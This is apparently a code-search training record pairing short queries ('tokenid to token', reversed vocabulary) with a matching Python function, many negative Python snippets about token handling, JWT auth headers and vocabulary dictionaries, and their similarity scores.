Depends(token_header)):\n return decode_token(token)", "def verify_auth_token(token):\n serializer = Serializer(SECRET_KEY)\n try:\n data = serializer.loads(token)\n except SignatureExpired:\n return None # valid token, but expired\n except BadSignature:\n return None # invalid token\n return data['token']", "def get_token(self):\n\n try:\n return jwt.decode(self.fetch_token(), KEY, algorithms=['HS256'])\n except jwt.exceptions.DecodeError:\n raise InvalidToken", "def token(self) -> Token:\n return getattr(self, \"tok\", None)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n print(auth)\n\n if not auth:\n raise AuthError({\"code\": \"authorization_header_missing\",\n \"description\":\n \"Authorization header is expected\"}, 401)\n \n parts = auth.split()\n \n if parts[0].lower() != \"bearer\":\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must start with\"\n \" Bearer\"}, 401)\n elif len(parts) == 1:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\": \"Token not found\"}, 401)\n elif len(parts) > 2:\n raise AuthError({\"code\": \"invalid_header\",\n \"description\":\n \"Authorization header must be\"\n \" Bearer token\"}, 401)\n\n token = parts[1]\n return token", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected'}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header must start with Bearer'}, 401)\n\n if len(parts) < 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Token not found after Bearer'}, 401)\n\n if len(parts) > 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header is an invalid token structure'}, 401)\n\n return parts[1]", "def process_id_from(self):\r\n return self._tokens[1]", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, 401)\n\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, 401)\n\n elif len(parts) == 1:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, 401)\n\n elif len(parts) > 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, 401)\n\n token = parts[1]\n return token", "def get_token(headers):\n bearer = headers.get('Authorization')\n if bearer:\n try:\n token_type, token = bearer.rsplit(' ', 1)\n except ValueError:\n raise TokenError('Wrong bearer string: %s', bearer)\n\n if token_type != 'Bearer':\n raise TokenError('Wrong token type: %s, must be %s',\n token_type, 'Bearer')\n return token\n raise TokenError('No token is given in the Authorization header')", "def _get_token(self): # pragma: no cover\n\n tokenCookie = None\n for cookie in self._session.cookies:\n if \"mast_token\" in cookie.name:\n tokenCookie = cookie\n break\n\n if not tokenCookie:\n warnings.warn(\"No auth token found.\", AuthenticationWarning)\n\n return tokenCookie", "def parse_token(token):\n return jwt.decode(token, app.config['JWT_SECRET'])", "async def get_user_token_strict(token: Optional[str] = Depends(get_user_token)) -> str:\n if token:\n return token\n raise exceptions.AuthenticationException()", "def get_token():\n # get authorization header:\n auth = request.headers.get('Authorization', None)\n \n # authorization header should be included:\n if auth is None:\n raise JWTError(\n {\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected.'\n }, \n 401\n )\n \n # authorization header should be 'Bearer [JWT]'\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\".'\n }, \n 401\n )\n elif len(parts) == 1:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Token not found.'\n }, \n 401\n )\n elif len(parts) > 2:\n raise JWTError(\n {\n 'code': 'invalid_header',\n 'description': 'Authorization header must be bearer token.'\n }, \n 401\n )\n\n # extract JWT:\n token = parts[1]\n\n return token", "def retrieve_token(filename):\n with open(filename, 'r') as f:\n token = f.readline()\n\n return token", "def getToken(request):\n try:\n token = request.META['HTTP_AUTHORIZATION'].split()[1]\n except:\n token = \"\"\n return token", "def _get_token(self) -> str:\n if IS_SUPERVISOR:\n # On supervisor installs the token is provided by a environment variable\n return os.environ[\"HASSIO_TOKEN\"]\n return self._token", "def prep_token(**kwargs):\n token = kwargs.get('token')\n if not token:\n token = oauth2_wrappers.gen_token()\n return token", "def get_task_token(decision):\n try:\n return decision[\"taskToken\"]\n except KeyError:\n # No taskToken returned\n return None", "def get_id(self, word, add=False):\n if word not in self.word_to_id:\n if add:\n self._add_new_word(word)\n return self.word_to_id[constants.UNK_TOKEN]\n return self.word_to_id[word]", "def get_token(self): # pragma: no cover\n\t\treturn (session.get(\"access_token\"), \"\")" ]
[ "0.8310672", "0.7980398", "0.79235566", "0.7840283", "0.7578476", "0.730748", "0.71591955", "0.7151534", "0.7099397", "0.6803577", "0.66393685", "0.65554255", "0.6520694", "0.64726806", "0.64626735", "0.6437027", "0.6431865", "0.6408412", "0.63829017", "0.6313626", "0.62993306", "0.6289849", "0.62813705", "0.62648714", "0.62648714", "0.62607694", "0.62452286", "0.62452286", "0.62452286", "0.6183551", "0.61645305", "0.6161283", "0.6161283", "0.6161283", "0.6134753", "0.6118412", "0.6109119", "0.6093843", "0.60914665", "0.6087006", "0.60820216", "0.60596764", "0.60578436", "0.6046646", "0.60442126", "0.60429186", "0.60398537", "0.60335237", "0.6032102", "0.60296017", "0.60249937", "0.6010589", "0.599783", "0.5995214", "0.59918994", "0.59489554", "0.59388304", "0.59348774", "0.59307253", "0.59307253", "0.5927049", "0.59014535", "0.5879281", "0.58682775", "0.58655936", "0.58544874", "0.5845288", "0.58435464", "0.5841719", "0.5834561", "0.583097", "0.5830678", "0.58211905", "0.581653", "0.5815282", "0.5775528", "0.5761582", "0.5761389", "0.5749766", "0.57477707", "0.5739386", "0.57343584", "0.57139224", "0.57043034", "0.56944424", "0.568379", "0.5676884", "0.56684685", "0.5658094", "0.5640935", "0.56401306", "0.5633947", "0.5624952", "0.56210846", "0.5616927", "0.56167054", "0.5612738", "0.560682", "0.5597555", "0.55860263" ]
0.8298625
1
tokenid to token (string).
def id_to_token(self, idx): return self._id2token[idx]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def map_id_to_token(self, id: int):\n return self._id_to_token[id]", "def token_to_id(self, token):\r\n return self.encoder.get(token, self.encoder.get(self.unk_token))", "def token_to_id(self, token):\n token = self.process_token(token)\n return self.token2id.get(token, len(self.token2id) - 1)", "def _convert_id_to_token(self, index):\n if index in self.fairseq_ids_to_tokens:\n return self.fairseq_ids_to_tokens[index]\n return self.sp_model.IdToPiece(index - self.fairseq_offset)", "def token_to_id(self, token):\n token = self.process_token(token)\n return self._token2id.get(token, len(self._token2id) - 1)", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(str(token))", "def id_to_token(self, index):\r\n return self.decoder.get(index)", "def _convert_id_to_token(self, index, return_unicode=True):\n token = self.sp_model.IdToPiece(index)\n return token", "def token(self) -> str:", "def _convert_id_to_token(self, index):\n return self.reverse_vocab.get(index, self.unk_token)", "def _convert_id_to_token(self, index, return_unicode=True):\n token = self.sp_model.IdToPiece(index)\n if six.PY2 and return_unicode and isinstance(token, str):\n token = token.decode('utf-8')\n return token", "def token_id_hex(self) -> str: # this is *ALSO* a MINT property\n return self.token_id.hex()", "def _convert_token_to_id(self, token):\n return self.sp_model.PieceToId(token)", "def get_token(self, token_id):\n raise exception.NotImplemented() # pragma: no cover", "def process_id_to(self):\r\n return self._tokens[3]", "def generate_token_string(token):\n if JWT_AUTH:\n return 'JWT {}'.format(token)\n else:\n return 'Token {}'.format(token)", "def token_id(self) -> pulumi.Output[int]:\n return pulumi.get(self, \"token_id\")", "def _convert_token_to_id(self, token):\n return self.vocab.get(token, self.vocab.get(self.unk_token))", "def token2String(self,tokens):\n return self._support.token2String(tokens)", "def make_token(self, data: object) -> str:\n return self.serializer.dumps(data)", "def get_token_id(self):\n return f\"{self.document_title}_{self.index}\"", "def token(self, id):\r\n return Token(self, id)", "def make_token():\n return secrets.token_urlsafe(36)", "def map_token_to_id(self, token: str):\n if token not in self._token_to_id:\n token = self._unk_token\n return self._token_to_id[token]", "def token(db):\n user = User.find_by_identity('admin@localhost.com')\n return user.serialize_token()", "def tostr(token):\n if token is True:\n return '#t'\n if token is False:\n return '#f'\n if isa(token, Symbol):\n return token\n if isa(token, str):\n import json\n return json.dumps(token)\n if isa(token, complex):\n result = str(token).replace('j', 'i')\n if result.find('(') < 0:\n return result\n return result[1:-1]\n if isa(token, list):\n return '(' + ' '.join(map(tostr, token)) + ')'\n return str(token)", "def _convert_token_to_id(self, token):\n if token in self.fairseq_tokens_to_ids:\n return self.fairseq_tokens_to_ids[token]\n spm_id = self.sp_model.PieceToId(token)\n\n # Need to return unknown token if the SP model returned 0\n return spm_id + self.fairseq_offset if spm_id else self.unk_token_id", "def odb_token():\n return genToken()", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def token(self) -> str:\n return pulumi.get(self, \"token\")", "def generateToken():\n length = random.randint(8, 32)\n rdmtoken = ''.join(random.choice(string.printable) for i in range(length))\n return f'{rdmtoken}'", "def decode_token(token):\n text = xlmr.decode(torch.tensor(token).long())\n return text.replace(' ', '')", "def generate_token(self):\n token = randint(100000000000000000, 999999999999999999)\n return str(token)", "def token(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"token\")", "def convert_to_string(tokens):\n\n return ' '.join(tokens)", "def __str__(self):\n return str(self.__token)", "def token(self) -> str:\n raise NotImplementedError", "def encode_auth_token(self, id):\n payload = {\n \"exp\": datetime.utcnow()\n + timedelta(\n days=current_app.config.get(\"TOKEN_EXPIRATION_DAYS\"),\n seconds=current_app.config.get(\"TOKEN_EXPIRATION_SECONDS\"),\n ),\n \"iat\": datetime.utcnow(),\n \"sub\": id,\n }\n return jwt.encode(\n payload, current_app.config.get(\"SECRET_KEY\"), algorithm=\"HS256\"\n )", "def generate_token():\n return uuid4()", "def new_token(*args, **kwargs):\n return uuid.uuid4().hex", "def token_str(self) -> Optional[str]:\n return self._token_str", "def _id(self):\n result = ''\n while self.current_char is not None and self.current_char.isalnum() or self.current_char == '_':\n result += self.current_char\n self.advance()\n\n return Token(ID, result)", "def get_client_token(**_):\n return str(uuid.uuid4())", "def get_token(self, tid):\n if self.lliagraph:\n return self.lliagraph.get_token(tid)\n else:\n return None", "def string2Token(self,phrase):\n return self._support.string2Token(phrase)", "def identifier(self) -> str:\n return self.current_token", "def create_token(self,uid):\n token_str = self.get_random(5) + str(uid) + str(int(time.time()))\n m = hashlib.md5()\n m.update(token_str)\n return m.hexdigest()", "def process_id_from(self):\r\n return self._tokens[1]", "def generate_token(self, user_id):\n try:\n # set up a payload with an expiration time\n payload = {\n 'exp': datetime.utcnow() + timedelta(minutes=10),\n 'iat': datetime.utcnow(),\n 'sub': user_id\n }\n # create the byte string encoded token using payload and SECRET key\n jwt_string = jwt.encode(\n payload,\n SECRET_KEY,\n algorithm='HS256'\n )\n return jwt_string\n except Exception as e:\n # return an error in string format if an exception occurs\n return str(e)", "def __str__(self):\n return self.token", "def token(uncapped_token):\n return uncapped_token", "def token(self):\n \n payload = {\n 'sub_type': self.sub_type,\n '_hash' : self._hash,\n 'jti' : str(uuid.uuid4())\n }\n return jwt.encode(payload, self.secret, self.algo).decode('utf-8')", "def get(uid: int, token_id: int):\n\n token = Token.get(uid, token_id).as_dto().to_primitive()\n\n if token:\n return token.to_primitive()\n else:\n raise NotFound(\"Token Not Found\")", "def token(uncapped_token: Contract):\n return uncapped_token", "def string_val(self) -> str:\n return self.current_token", "def decode_tokens_to_str(self, tokens: List[int]) -> str:\n hypothesis = self.tokenizer.ids_to_text(tokens)\n return hypothesis", "def get_token(id=None, name=None):\n\tif id is None and name is None:\n\t\tname = config['username']\n\treturn get_user(id=id, name=name, get_missing=False).token", "def identifier(self):\n _id = ''\n while self.current_char is not None and self.current_char.isalpha():\n # inner loop to get alphanumeric characters\n while self.current_char is not None and\\\n self.current_char.isalnum():\n _id += self.current_char\n self.advance()\n return Token(self.tokentype['ID'], _id)", "def getUniStr(self):\n return(\"%s/%s\"%(self.token.id,self.type))", "def get_token(self):\n return self.__token", "def get_token(self):\n return self.__token", "def _identifier(self):\n identifier = self._get_next_symbol()\n\n while True:\n symbol = self._get_next_symbol()\n if symbol != None and symbol.isalnum():\n identifier += symbol\n else:\n if symbol != None:\n self._back()\n break\n\n return self._create_identifier_token(identifier)", "def id(self, tokens):\n if len(tokens) != 1:\n raise Exception(\"Unexpected argument counts\")\n return tokens[0].value", "def decode_token(token):\n payload = None\n try:\n payload = jwt.decode(token.encode('utf-8'), '1$Arh\"1bWa/7+OS', algorithm='HS256')['u_id']\n except jwt.InvalidTokenError:\n pass\n return payload", "def token(self):\n return self[\"token\"]", "def token2id(data, mode):\n vocab_path = 'vocab.' + mode\n in_path = data + '.' + mode\n out_path = data + '_ids.' + mode\n _, vocab = load_vocab(os.path.join(config.PROCESSED_PATH, vocab_path))\n in_file = open(os.path.join(config.PROCESSED_PATH, in_path), 'rb')\n out_file = open(os.path.join(config.PROCESSED_PATH, out_path), 'wb')\n\n lines = in_file.read().splitlines()\n for line in lines:\n if mode == 'dec': # we only care about '<s>' and </s> in encoder\n ids = [vocab[b'<s>']]\n else:\n ids = []\n ids.extend(sentence2id(vocab, line))\n # ids.extend([vocab.get(token, vocab['<unk>']) for token in basic_tokenizer(line)])\n if mode == 'dec':\n ids.append(vocab[b'</s>'])\n out_file.write(b' '.join(str(id_).encode('ascii') for id_ in ids) + b'\\n')", "def generate_token(payload: Any, secret: str | List[str]) -> str:\n return url_encode_full_stops(URLSafeTimedSerializer(secret).dumps(payload, \"token\"))", "def encode_token(userId):\n token = jwt.encode({'userId': userId, 'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=20)},\n secret_key).decode('utf-8')\n return token", "def token_id(self) -> Optional[pulumi.Input[int]]:\n return pulumi.get(self, \"token_id\")", "def generate_client_token_by_uuid():\n return str(uuid.uuid4())", "def generate_client_token_by_uuid():\n return str(uuid.uuid4())", "def token(self, ent):\n if ent.eid in self.lookup: return self.lookup[ent.eid]\n\n if ent.tid == data.AGENT_TYPE_ID: prefix = 'A'\n elif ent.tid in data.combatants: prefix = 'C'\n elif ent.tid in data.gatherable: prefix = 'G'\n\n ct = self.counts[prefix]\n self.counts[prefix] += 1\n tok = \"{}{}\".format(prefix, ct)\n self.lookup[ent.eid] = tok\n return tok", "def token(self):\n if not hasattr(self,'_tokens'):\n ts = str(time.time())\n rs = str(random.randint(1234,65535))\n self._tokens = '%s_%s_%s' % (self.key().name(),ts,rs)\n return self._tokens", "def _generate_token_value():\n return secrets.token_urlsafe()", "def token(self, ent):\n if ent.eid in self.lookup: return self.lookup[ent.eid]\n\n if ent.tid == data.AGENT_TYPE_ID: prefix = 'A'\n elif ent.tid in data.combatants: prefix = 'C'\n elif ent.tid in data.gatherable: prefix = 'G'\n\n self.lookup[ent.eid] = prefix\n return prefix", "def get_token(self, bot_id):\n res = self.execute(TABELLE['bot']['select']['by_id'], (bot_id,))\n # print(res)\n return res", "def token_to_word(self, token):\n\n word = \" \" if token == 0 else self.index_to_word[token]\n return word", "def parse_token(bn,token):\n return bn.split(token)[1].split('_')[0]", "def convertTokensToSourceString(self, tokens):\n sense = self.sense\n return \" \".join([sense.tokens[t-1][1]\n if t > 0 else \"[%s]\" % sense.tokens[sense.mapNodeToMainToken[-t]-1][0]\n for t in tokens])", "def toString(self):\n return self.tokens.toString()", "def token(self):\r\n return self._token", "def token(self):\n payload = {\n 'id': str(self.id),\n 'username': self.username,\n \"exp\": datetime.now() + timedelta(days=2)\n }\n return jwt.encode(payload, SECRET_KEY).decode('utf-8')", "def token_id_to(self, token_id_to):\n\n self._token_id_to = token_id_to", "def get_token(self):\n\n return self._token", "def generate(self):\n return self.rpc.call(MsfRpcMethod.AuthTokenGenerate)['token']", "def token(db):\n token = TokenFactory()\n db.session.commit()\n return token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def token(self):\n return self._token", "def _token_to_id(self, sequence_tokens, token_map, char_map, ngram=0,\n token_ngram_map=None, max_char_sequence_length=-1,\n max_char_length_per_token=-1):\n token_id_list = []\n char_id_list = []\n char_in_token_id_list = []\n ngram_id_list = []\n for token in sequence_tokens:\n char_id = [char_map.get(x, self.VOCAB_UNKNOWN) for x in token]\n char_id_list.extend(char_id[0:max_char_sequence_length])\n char_in_token = [char_map.get(x, self.VOCAB_UNKNOWN)\n for x in token[0:max_char_length_per_token]]\n char_in_token_id_list.append(char_in_token)\n\n token_id_list.append(\n token_map.get(token, token_map[self.VOCAB_UNKNOWN]))\n if ngram > 1:\n for j in range(2, ngram + 1):\n ngram_id_list.extend(\n token_ngram_map[x] for x in\n [\"\".join(sequence_tokens[k:k + j]) for k in\n range(len(sequence_tokens) - j + 1)] if x in\n token_ngram_map)\n if not sequence_tokens:\n token_id_list.append(self.VOCAB_PADDING)\n char_id_list.append(self.VOCAB_PADDING)\n char_in_token_id_list.append([self.VOCAB_PADDING])\n if not ngram_id_list:\n ngram_id_list.append(token_ngram_map[self.VOCAB_PADDING])\n return token_id_list, char_id_list, char_in_token_id_list, ngram_id_list", "def get_token(self):\n token = self._session.token\n return token", "def get_word(self, word_id):\n if word_id in self.id_to_word:\n return self.id_to_word[word_id]\n return constants.UNK_TOKEN", "def generate_new_token(uid):\n random_token = uuid.uuid4()\n token = TokenAuth(user_id=uid, token=random_token)\n token.save()\n return random_token", "def tokenize(*args, **kwargs):\n if kwargs.pop('pure', False):\n return base.tokenize(*args)\n else:\n return str(uuid.uuid4())", "def decode_token(token):\n try:\n # Decode token with our secret key\n payload = jwt.decode(token, SECRET_KEY)\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # token has expired\n return \"Timed out. Please login to get a new token\"\n except jwt.InvalidTokenError:\n return \"Invalid token. Please register or login\"", "def token(self) -> Optional[str]:\n return self._builder._token", "def convert_tokens_to_string(self, tokens):\r\n text = ''.join(tokens)\r\n text = bytearray([self.byte_decoder[c] for c in text]).decode('utf-8', errors=self.errors)\r\n return text", "def decode_token(token):\n try:\n # try to decode the token using our SECRET variable\n payload = jwt.decode(token, app.config.get('SECRET_KEY'), algorithms=['HS256'])\n return payload['sub']\n except jwt.ExpiredSignatureError:\n # the token is expired, return an error string\n return \"Expired token. Please login to get a new token\"\n except jwt.InvalidTokenError:\n # the token is invalid, return an error string\n return \"Invalid token. Please register or login\"" ]
[ "0.7235237", "0.69436103", "0.6893987", "0.6749872", "0.67123127", "0.6693682", "0.6675571", "0.6672998", "0.6606152", "0.66021", "0.65837336", "0.6532288", "0.6484542", "0.64636326", "0.6327243", "0.62979484", "0.6255819", "0.6240919", "0.6239636", "0.6181812", "0.6127101", "0.61171526", "0.60637593", "0.6061362", "0.6053765", "0.60517514", "0.6048818", "0.6044519", "0.6042805", "0.6042805", "0.6042805", "0.60329777", "0.5997915", "0.59543717", "0.59190714", "0.5912813", "0.58965236", "0.5892763", "0.5883206", "0.5861231", "0.58474785", "0.5845007", "0.5838376", "0.58327585", "0.5821224", "0.5816067", "0.5812652", "0.58045083", "0.57851505", "0.5771515", "0.57606", "0.57363135", "0.57292736", "0.57220364", "0.57161117", "0.57045275", "0.56796557", "0.5668658", "0.5656479", "0.56491184", "0.5647739", "0.5647739", "0.5642004", "0.562873", "0.5625179", "0.5623233", "0.5620486", "0.5614562", "0.56116515", "0.56103754", "0.55896914", "0.55896914", "0.55888283", "0.55881333", "0.5576327", "0.5576221", "0.55753624", "0.554752", "0.55412453", "0.55298054", "0.552699", "0.55260754", "0.55240077", "0.55210984", "0.55091023", "0.5505463", "0.54969895", "0.54915464", "0.54915464", "0.54915464", "0.5480269", "0.54339933", "0.54221207", "0.5411542", "0.54101264", "0.5406955", "0.5399852", "0.53924626", "0.5385505" ]
0.7267592
1
Return the vocabulary as a reversed dict object.
def reverse_vocab(self): return self._id2token
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def reverse_vocab(vocab: Dict[str, int]) -> Dict[int, str]:\n return {v: k for k, v in vocab.items()}", "def reverse_dicts(self):\n\t\tself.rev_worddict = {self.worddict[word]: word for word in self.worddict}\n\t\tself.rev_classdict = {self.classdict[cl]: cl for cl in self.classdict}", "def __reversed__(self):\n\t\treturn reversed(self.__dict__.values())", "def reverse(dictionary):\n return {b: a for a, b in dictionary.items()}", "def generate_vocab_dict(vocab):\n v_dict = {}\n for word in vocab:\n if len(word) in v_dict:\n v_dict[len(word)].append(word)\n else:\n v_dict[len(word)] = [word]\n return v_dict", "def _rev_dict(d):\n return {v: k for k, v in d.items()}", "def reverse_word_index(word_index):\n return dict([(word_index[word], word) for word in word_index])", "def vocabulary(self):\n return self._vocabulary", "def as_dict(self):\r\n return {self.words[i]: self.vectors[i] for i in range(self.n)}", "def build_reverse_dictionary(word_to_id):\n reverse_dictionary = dict(zip(word_to_id.values(), word_to_id.keys()))\n return reverse_dictionary", "def vocabulary(self):\n return [recid for recid in self._model.vocab]", "def _get_term_dictionaries(self):\n\t\tforward_dict = {}\n\t\treverse_dict = defaultdict(list)\n\t\tfor term in self.terms():\n\t\t\tif (term.name is not None) and (\"obsolete\" not in term.name): \n\t\t\t\twords = [term.name]\n\t\t\t\twords.extend([x.description for x in list(term.synonyms)])\t# Add all the synonyms\n\t\t\t\twords = [re.sub(r\" ?\\([^)]+\\)\", \"\", x) for x in words]\t\t# Replace parenthetical text.\n\t\t\t\tforward_dict[term.id] = words\n\t\t\t\tfor word in words:\n\t\t\t\t\treverse_dict[word].append(term.id)\n\t\treturn(forward_dict, reverse_dict)", "def get_ordered_vocabulary(self):\n idx_rev = dict((y, x) for x, y in self.ngram_to_idx.items())\n ordered_vocab = list(map(lambda i: idx_rev[i], range(len(self.vocab))))\n return ordered_vocab", "def vocabulary(self):\n lst = []\n for key in self.frequencies().keys():\n lst.append(key)\n return sorted(lst)\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # for word in wordslst:\n # if word not in lst:\n # lst.append(word.lower())\n #return sorted(lst)", "def load_reverse_dict(dict_path):\n result_dict = {}\n # TODO 字和词模型\n for idx, line in enumerate(io.open(dict_path, \"r\", encoding='utf8')):\n terms = line.strip(\"\\n\")\n result_dict[terms] = idx\n return result_dict", "def invert(self):\n return _({self[k]: k for k in self._})", "def build_vocab(sentences, saved_vocabulary_inv):\n if saved_vocabulary_inv:\n vocabulary_inv = saved_vocabulary_inv\n else:\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences))\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def generate_vocabulary():\n stop_words = load_stop_words()\n words = ' '.join(generate_corpus()).split()\n print(len(words))\n vocabulary = {}\n for word in words:\n if word in stop_words:\n continue\n if word in vocabulary.keys():\n vocabulary[word] += 1\n else:\n vocabulary[word] = 1\n vocabulary = dict(sorted(vocabulary.items(), key=lambda x: x[1], reverse=True))\n return vocabulary", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_dict(self):\n return {key: value for key, value in zip(self._words, self._vecs)}", "def getVocabulary(self): # real signature unknown; restored from __doc__\n pass", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"rb\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [tf.compat.as_bytes(line.strip()) for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def initialize_vocabulary(vocabulary_path):\n if gfile.Exists(vocabulary_path):\n rev_vocab = []\n with gfile.GFile(vocabulary_path, mode=\"r\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def get_vocab(self):\n word2id = {}\n for document in self.docs:\n for word in document:\n if word not in word2id.keys():\n word2id[word] = len(word2id)\n return word2id", "def initialize_vocabulary(vocabulary_path):\n if os.path.exists(vocabulary_path):\n rev_vocab = []\n with codecs_open(vocabulary_path, \"rb\", encoding=\"utf-8\") as f:\n rev_vocab.extend(f.readlines())\n rev_vocab = [line.strip() for line in rev_vocab]\n vocab = dict([(x, y) for (y, x) in enumerate(rev_vocab)])\n return vocab, rev_vocab\n else:\n raise ValueError(\"Vocabulary file %s not found.\", vocabulary_path)", "def getVocabularyDict(vocabulary: dict, training_feature: TrainingFeature):\n vocab = {}\n index = 0\n if training_feature.FEATURE_DROP_FREQUENT_WORDS:\n print(\"Select vocabdict with drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key= lambda x: x[1])\n print(\"Total length: \", len(array))\n length = len(array)\n array = array[int(length * 0.75): int(length * 1.0)][0:training_feature.VOCAB_SIZE]\n for (k , _) in array:\n vocab.setdefault(k, index)\n index += 1\n else:\n print(\"Select vocabdict with non_drop_frequent\")\n array = sorted([(k, v) for (k, v) in vocabulary.items()], key=lambda x: x[1])\n length = len(array)\n print(\"Total length: \", length)\n array = array[-training_feature.VOCAB_SIZE:]\n for (k, _) in array:\n vocab.setdefault(k, index)\n index += 1\n # for (k, v) in vocabulary.items():\n # if v > 50:\n # vocab.setdefault(k, index)\n # index += 1\n print(\"VocabDict length: \", len(vocab))\n # print(vocab)\n return vocab", "def reverse_iteritems(self):\n return self._reverse_store.iteritems()", "def invertDictionary(input_dict):\n inverse_dict = {v: k for k, v in input_dict.items()}\n\n return inverse_dict", "def build_vocab(sentences):\n # Build vocabulary\n word_counts = Counter(itertools.chain(*sentences)) # 实际没用到\n # Mapping from index to word\n vocabulary_inv = [x[0] for x in word_counts.most_common()]\n vocabulary_inv = list(sorted(vocabulary_inv))\n # 加入 <UNK>\n vocabulary_inv.insert(0, '</s>')\n # Mapping from word to index\n vocabulary = {x: i for i, x in enumerate(vocabulary_inv)}\n return [vocabulary, vocabulary_inv]", "def reverse_values(self):\n return self._reverse_store.values()", "def get_output_vocab():\n vocab = set(list(string.digits) + [':'])\n\n inv = dict(enumerate(sorted(vocab)))\n output = {v:k for k,v in inv.items()}\n return output, inv", "def getVocabulary(vocabulary_id):\n relex_web = getSite().restrictedTraverse('relex_web')\n key = KEY_STORAGE + \".\" + vocabulary_id\n vocabulary = json.loads(getattr(relex_web, key, \"[]\"))\n return vocabulary", "def get_vocab(self):\n\n\t\tself.parse_transcript() \n\t\tself.purge_words()\n\t\tself.analyze_words()\n\t\tself.sort_word_analysis()", "def get_vocab(self):\n if os.path.exists(self.vocab_file) & self.vocab_from_file:\n f = open(self.vocab_file, \"rb\")\n vocab = pickle.load(f)\n self.word2idx = vocab.word2idx\n self.idx2word = vocab.idx2word\n f.close()\n else:\n self.build_vocab()\n with open(self.vocab_file, 'wb') as f:\n pickle.dump(self, f)", "def _get_vocabulary(connection):\n print('---Getting vocabulary---')\n vocabulary = {}\n cursor = connection.cursor()\n cursor.execute(\"SELECT * FROM words;\")\n res = cursor.fetchall()\n num_words = 0\n for word in res:\n vocabulary[word[0]] = num_words\n num_words += 1\n return vocabulary", "def revert_dictionary(dictionary):\n return {v: k for k, v in dictionary.items()}", "def _load_vocabulary(self) -> Dict[str, int]:\n\n df_existing_vocab = self._db_connection.get_dataframe(table_name='tfidf_vocabulary', schema='encoded_articles')\n\n df_existing_vocab.set_index('word', inplace=True)\n\n return df_existing_vocab['feature_matrix_index'].to_dict()", "def decode(self, seq):\n return [ self.rev_vocab[int(el)] for el in seq ]", "def load_vocab(vocab_file):\n index = 0\n itos = {}\n stoi = {}\n with open(vocab_file, \"r\") as reader:\n while True:\n token = reader.readline()\n if not token:\n break\n 